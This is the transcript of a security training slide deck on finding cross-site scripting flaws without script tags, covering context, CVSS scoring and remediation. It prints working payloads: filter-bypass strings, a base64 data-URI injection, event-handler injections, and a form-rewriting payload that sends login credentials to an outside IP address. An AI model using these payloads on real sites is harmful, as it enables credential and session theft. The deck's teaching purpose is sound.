Application Context and Discovering XSS without
-
Upload
todd-benson -
Category
Technology
-
view
879 -
download
0
description
Transcript of Application Context and Discovering XSS without
![Page 1: Application Context and Discovering XSS without](https://reader036.fdocuments.in/reader036/viewer/2022081602/556575b7d8b42a7b518b51d3/html5/thumbnails/1.jpg)
Todd Benson
Application Context and Discovering XSS without <Script>
![Page 2: Application Context and Discovering XSS without](https://reader036.fdocuments.in/reader036/viewer/2022081602/556575b7d8b42a7b518b51d3/html5/thumbnails/2.jpg)
Overview
• Review XSS• Discuss XSS test cases and discovery• Context• CVSS Scoring• Exploiting• Complimentary Vulnerabilities• Remediation
![Page 3: Application Context and Discovering XSS without](https://reader036.fdocuments.in/reader036/viewer/2022081602/556575b7d8b42a7b518b51d3/html5/thumbnails/3.jpg)
XSS Review
• Risk level: Moderate
• Description: Cross-Site Scripting results from application parameters that allow user-supplied input to be presented in subsequent responses. In particular, when the application allows HTML and JavaScript special characters to be reflected, an attacker can cause the victim to observe different application behavior than expected.
• Exploitation vector: In XSS scenarios, the application allows attacker to use the application as a launching point for attacks against victims’ workstations. An attacker with knowledge of the vulnerability can construct URLs to appropriate PACTS application pages that cause malicious activity within the victim’s browser.
• Recommendation: Validate user-supplied input server-side. Sanitize special characters (e.g., <, >, “, ‘, etc) prior to returning those values to a requesting client.
![Page 4: Application Context and Discovering XSS without](https://reader036.fdocuments.in/reader036/viewer/2022081602/556575b7d8b42a7b518b51d3/html5/thumbnails/4.jpg)
XSS Test Cases - Formal
1. Submit payloads to each request parameter2. Identify any instances of the application returning the
request parameter unmodified3. Find the location within the HTML of the supplied input and
review the surrounding HTML to identify potential payloads4. Submit various possible payloads to the application via
identified parameters5. If payloads are returned unmodified, confirm with a
browser6. If the payloads are modified, attempt to bypass the server-
side filters
![Page 5: Application Context and Discovering XSS without](https://reader036.fdocuments.in/reader036/viewer/2022081602/556575b7d8b42a7b518b51d3/html5/thumbnails/5.jpg)
XSS Discovery
• Basic Reflection– XSSTEST
• Filter Detection– <XSSTEST>– <"';()>– "';()– %3cXSSTEST%3e– %3c%22%27%3b%28%29%3e– %22%27%3b%28%29– %25%33%63XSSTEST%25%33%65– %25%33%63%25%32%32%25%32%37%25%33%62%25%32%38%25%
32%39%25%33%65– %25%32%32%25%32%37%25%33%62%25%32%38%25%32%39
![Page 6: Application Context and Discovering XSS without](https://reader036.fdocuments.in/reader036/viewer/2022081602/556575b7d8b42a7b518b51d3/html5/thumbnails/6.jpg)
XSS Test Cases – In reality
1. Discover XSS - Tool(s)2. Confirm existence3. Show PoC (Alert popup)4. Craft an exploit – Filter?– How easily is the exploit detected?– Will the exploit run most or all of the time?– What are factors that may not allow it to run?
5. With other Vulns
![Page 7: Application Context and Discovering XSS without](https://reader036.fdocuments.in/reader036/viewer/2022081602/556575b7d8b42a7b518b51d3/html5/thumbnails/7.jpg)
Discovering XSS
Using tools– Pretty good, for reflective– Some are better than others– Even when they are good, they can only do so
much– At best, PoC– Don’t understand context
![Page 8: Application Context and Discovering XSS without](https://reader036.fdocuments.in/reader036/viewer/2022081602/556575b7d8b42a7b518b51d3/html5/thumbnails/8.jpg)
Context
What do we mean by context? What… area of the application? Where… in the page is the payload injected? Who… is the client (User role AND browser)? How…. will it be exploited?
![Page 9: Application Context and Discovering XSS without](https://reader036.fdocuments.in/reader036/viewer/2022081602/556575b7d8b42a7b518b51d3/html5/thumbnails/9.jpg)
CVSS Scoring
![Page 10: Application Context and Discovering XSS without](https://reader036.fdocuments.in/reader036/viewer/2022081602/556575b7d8b42a7b518b51d3/html5/thumbnails/10.jpg)
XSS – Login Demo
• Simple page– Enter username on one page and submit– Enter password and submit– Checks credentials– Filters against <script> and variants
![Page 11: Application Context and Discovering XSS without](https://reader036.fdocuments.in/reader036/viewer/2022081602/556575b7d8b42a7b518b51d3/html5/thumbnails/11.jpg)
XSS – Login Demo (cont)
Simple "><script>alert(1);</script><!--
![Page 12: Application Context and Discovering XSS without](https://reader036.fdocuments.in/reader036/viewer/2022081602/556575b7d8b42a7b518b51d3/html5/thumbnails/12.jpg)
XSS – Login Demo (cont)
Filter Bypass" type="hidden" /></center></form><object data="data:text/html;charset=utf-8; base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4NCg%3D%3D" /></body></html><!--
![Page 13: Application Context and Discovering XSS without](https://reader036.fdocuments.in/reader036/viewer/2022081602/556575b7d8b42a7b518b51d3/html5/thumbnails/13.jpg)
XSS – Login Demo (cont)
Form abuse" type=hidden></form><form action="http://156.132.142.11/passwords.php method="get"><input name="Username" value="
![Page 14: Application Context and Discovering XSS without](https://reader036.fdocuments.in/reader036/viewer/2022081602/556575b7d8b42a7b518b51d3/html5/thumbnails/14.jpg)
XSS without < or > - Demo
• Page has 6 different inputs, each one exploitable• For demo purposes only, not meant to be practical or
realistic• < and > are filtered– All exploits must be done in context
![Page 15: Application Context and Discovering XSS without](https://reader036.fdocuments.in/reader036/viewer/2022081602/556575b7d8b42a7b518b51d3/html5/thumbnails/15.jpg)
XSS without < or > - Demo (cont)
Payloads• Number: ';alert(1);a='
• Link: Test" onclick=alert(1) name="
• Image: a" onerror=alert(1) name=" ## use onload instead?
![Page 16: Application Context and Discovering XSS without](https://reader036.fdocuments.in/reader036/viewer/2022081602/556575b7d8b42a7b518b51d3/html5/thumbnails/16.jpg)
XSS without < or > - Demo (cont)
Payloads• Name: Todd";} catch(e) {}; alert(1); try{ a="
• Comment: test" type="image" src="a" onerror=alert(1) name="
• Color: ff000;display:block;position:absolute;top:0;left:0;width:999em;height:999em onmouseover=alert(1)
![Page 17: Application Context and Discovering XSS without](https://reader036.fdocuments.in/reader036/viewer/2022081602/556575b7d8b42a7b518b51d3/html5/thumbnails/17.jpg)
Exploiting – Crafting an Exploit
What can you do?• Modify the page (Site defacement) • Key Logger • Redirect Browser (Forced Browsing) – Steal Cookie (Session hijacking?)– XSSF– BeEF– Load remotely hosted scripts
• Data theft
![Page 18: Application Context and Discovering XSS without](https://reader036.fdocuments.in/reader036/viewer/2022081602/556575b7d8b42a7b518b51d3/html5/thumbnails/18.jpg)
Exploiting – Crafting an Exploit (Cont)
What else????• Combination: – Number: '; function test() { var elem =
document.getElementById("Comment"); elem.value = 'My default value';}; a=‘
– Comment: " onblur="test();" id="Comment
![Page 19: Application Context and Discovering XSS without](https://reader036.fdocuments.in/reader036/viewer/2022081602/556575b7d8b42a7b518b51d3/html5/thumbnails/19.jpg)
Complimentary Vulns
• GET/POST• HttpOnly• Session Hijacking• Clickjacking• CSRF• File Upload• What else???
XSS
GET POST
HTTPOnly
Session Hijacking
CSRFClickjacking
![Page 20: Application Context and Discovering XSS without](https://reader036.fdocuments.in/reader036/viewer/2022081602/556575b7d8b42a7b518b51d3/html5/thumbnails/20.jpg)
CVSS Scoring Steps
• One tool finds it – (Report Confidence: Unconfirmed; Exploitability:
Unproven that exploit exists)• Two tools find it – (Report Confidence: Uncorroborated)
• Manual verification in browser – (Report Confidence: Confirmed)
• Popup – (Exploitability: Proof of concept code)
• Exploit – (Exploitability: Functional exploit exists)
![Page 21: Application Context and Discovering XSS without](https://reader036.fdocuments.in/reader036/viewer/2022081602/556575b7d8b42a7b518b51d3/html5/thumbnails/21.jpg)
CVSS Scoring Steps (Cont)
Impact Metrics; General Modifiers; Access Complexity; Exploitability;• Type of exploit• Refined exploit • Complimentary vulns
![Page 22: Application Context and Discovering XSS without](https://reader036.fdocuments.in/reader036/viewer/2022081602/556575b7d8b42a7b518b51d3/html5/thumbnails/22.jpg)
Remediation
• <>"'=;• Properly Escape all untrusted
data based on context (Use a anti-XSS library)• Use Content Security Policy
![Page 23: Application Context and Discovering XSS without](https://reader036.fdocuments.in/reader036/viewer/2022081602/556575b7d8b42a7b518b51d3/html5/thumbnails/23.jpg)
Summary
• <script>alert(1);</script> isn’t enough to discover XSS and evaluate risk
• Context – Context – Context– of payloads– of who the user is– of location in application– of relation to other vulns
![Page 24: Application Context and Discovering XSS without](https://reader036.fdocuments.in/reader036/viewer/2022081602/556575b7d8b42a7b518b51d3/html5/thumbnails/24.jpg)
Questions?
![Page 25: Application Context and Discovering XSS without](https://reader036.fdocuments.in/reader036/viewer/2022081602/556575b7d8b42a7b518b51d3/html5/thumbnails/25.jpg)
References
• mitre• wahh• http://securityoverride.org/articles.php?article_id=13• SANS 542 and 642• http://www.slideshare.net/jimmanico